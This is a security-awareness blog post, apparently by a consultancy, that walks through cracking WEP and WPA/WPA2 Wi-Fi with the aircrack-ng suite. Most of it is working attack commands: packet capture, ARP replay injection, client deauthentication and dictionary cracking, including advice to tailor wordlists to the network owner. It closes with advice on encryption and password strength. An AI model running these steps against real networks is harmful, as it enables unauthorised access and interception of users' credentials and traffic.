Wireless Network Penetration

Wireless networks are becoming more and more widespread in our daily city lives and the security issues with these are often neglected. The general WIfi network can be secured through WEP, WPA or WPA2 encryption with various hashing functions. In this post we will show how each of these encryptions can be cracked or bypassed by an outsider with no knowledge of your systems.

The process we are going to use requires the aircrack-ng suite so before we start one needs to download and install the "aircrack-ng" package on their Linux box. I believe that it is also available for Windows but is more complex to get up and running as most windows based apps.

WEP
The weakest option is to use WEP encryption. This is not advisable as one can crack it in less than 5 minutes or so. Here is the process explained in detail:

1. Enable monitoring with "airmon-ng" - Type in the terminal:
    sudo airmon-ng start <interface> <channel>
* This should create a monitoring interface that you must use in all the following commands when it refers to <interface>.

2. Packet capturing with "airodump-ng" - Type in terminal:
    sudo airodump-ng -c <channel> --bssid 02:AF:5B:D7:1A:A8 -w <file_name> <interface>
    NOTE:
    -c: Select the channel of the target Wifi access point.
    --bssid: MAC address of target access point.
    -w: file name of the saved traffic file; mandatory field (in our case).
* consider using "--ivs" if you want to only save the password authentication session packets.

3. Check if MAC filtering is enabled - Type in terminal:
    sudo aireplay-ng -1 0 -e <target_essid> -a 02:AF:5B:D7:1A:A8 -h MY:MA:CA:DD:RE:SS <interface>
    NOTE:
    -1: '0' deauthenticates all clients.
    -e: ESSID (name) of target access point.
    -a: MAC address of target access point.
    -h: MAC address of your host.

   The resulting output should look like this if there is no MAC filtering:
    ** Sending Authentication Request
    ** Authentication successful
    ** Sending Association Request
    ** Association successful :-)

>>If there is no MAC filtering >
4. Perform packet re-injection with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -3 -b 02:AF:5B:D7:1A:A8 -h MY:MA:CA:DD:RE:SS <interface>
    NOTE:
    -3: Standard ARP-request replay.
    -b: MAC address of target access point.
    -h: MAC address of your host.
* You'll now see the number of data packets rising rapidly in 'airodump-ng'. This process can take around five minutes before you start receiving any ARP requests / IVs.
>continue to step 5>

>> If there is MAC filtering >
4.1 Perform deauthentication with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -0 3 -a 02:AF:5B:D7:1A:A8 -c 00:00:00:00:00:00 <interface>
    NOTE:
    -0: number of deauthentication attempts (our case its 3 // 1-5 are good values to use).
    -a: MAC address of target access point.
    -c: Client MAC address of a host on the network.

4.2 Then perform packet re-injection with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -3 -b 02:AF:5B:D7:1A:A8 -h 00:00:00:00:00:00 <interface>
    NOTE:
    -3: an ARP-request replay.
    -b: MAC address of target access point.
    -h: Client MAC address of a host on the network.
* You'll now see the number of data packets rising rapidly in 'airodump-ng'. This process can take around five minutes before you start receiving any ARP requests / IVs.
>continue to step 5>

5. Decryption with "aircrack-ng" - Type in terminal:
    sudo aircrack-ng -s <file_name>.cap
Alternatively if you have been wise to use the --ivs option in step one then type:
    sudo aircrack-ng -s <file_name>.ivs
*Be patient so that there is sufficient number of IVs in the traffic file before you start cracking the key!

The important point we learn from this is that the password complexity is not very relevant in the WEP encrypted network as the difference between cracking a 10 char hexadecimal key (64 bit encryption) and the 26 char hexadecimal key (128 bit encryption) is only a couple of extra minutes of packet sniffing.

WPA
Now if one is wise to use WPA / WPA2 encryption the process is similar with the difference that one cannot associate to the AP and use injection to get the IVs. Therefore we adapt our approach as follows:

The first 2 steps are the same:
1. Enable monitoring with "airmon-ng" - Type in the terminal:
    sudo airmon-ng start <interface> <channel>
* This should create a monitoring interface that you must use in all the following commands when it refers to <interface>.

2. Packet capturing with "airodump-ng" - Type in terminal:
    sudo airodump-ng -c <channel> --bssid 02:AF:5B:D7:1A:A8 -w <file_name> <interface>
    NOTE:
    -c: Select the channel of the target Wifi access point.
    --bssid: MAC address of target access point.
    -w: file name of the saved traffic file; mandatory field (in our case).
*Don't use the "--ivs" option as we need to capture the whole traffic to crack the key.

3. Perform deauthentication with "aireplay-ng" - Type in terminal:
    sudo aireplay-ng -0 3 -a 02:AF:5B:D7:1A:A8 -c 00:00:00:00:00:00 <interface>
    NOTE:
    -0: number of deauthentication attempts (our case its 3 // 1-5 are good values to use).
    -a: MAC address of target access point.
    -c: Client MAC address of a host on the network.
* With some luck you should be able to de-authenticate the client and capture the re-authentication handshake in the "airodump-ng" window.

4. Decryption with "aircrack-ng" - Type in terminal:    
    sudo aircrack-ng -w <wordlist.lst> <file_name>.cap
*Here we cannot force the transmission of thousands of IVs and so have to rely on the slow approach using the handshake hash and using a dictionary attack in the decryption process.

A dictionary attack can last a long time and result in failure so I would recommend that you spend a fair amount of time preparing a good dictionary based on any information about the access point owner and also using an alphanumeric password file with common character substitutions. The use of John the Ripper in Linux or Cain in Windows is recommended!

A complex WPA password of 11-14 characters in length that is not a common dictionary word and contains small letters, capital letters, numbers and special characters will take over a week to decrypt using the most powerful processors available and this will probably not be pursued by the average attacker. The important thing to note is that in WPA encryption password complexity plays the key role in securing the network!

Once in the network a malicious outsider can sniff all your traffic including personal login credentials, bank details from forms, browsing activity and many other info exposing the network to complete identity theft and information leakage. So please be aware, use the right encryption and password complexity and secure your networks.

We hope you enjoyed our article. The NetSafety team provides quality security consulting services, at affordable prices, around the globe! Contact us, if you think we can help!

*************www.netsafety.eu*************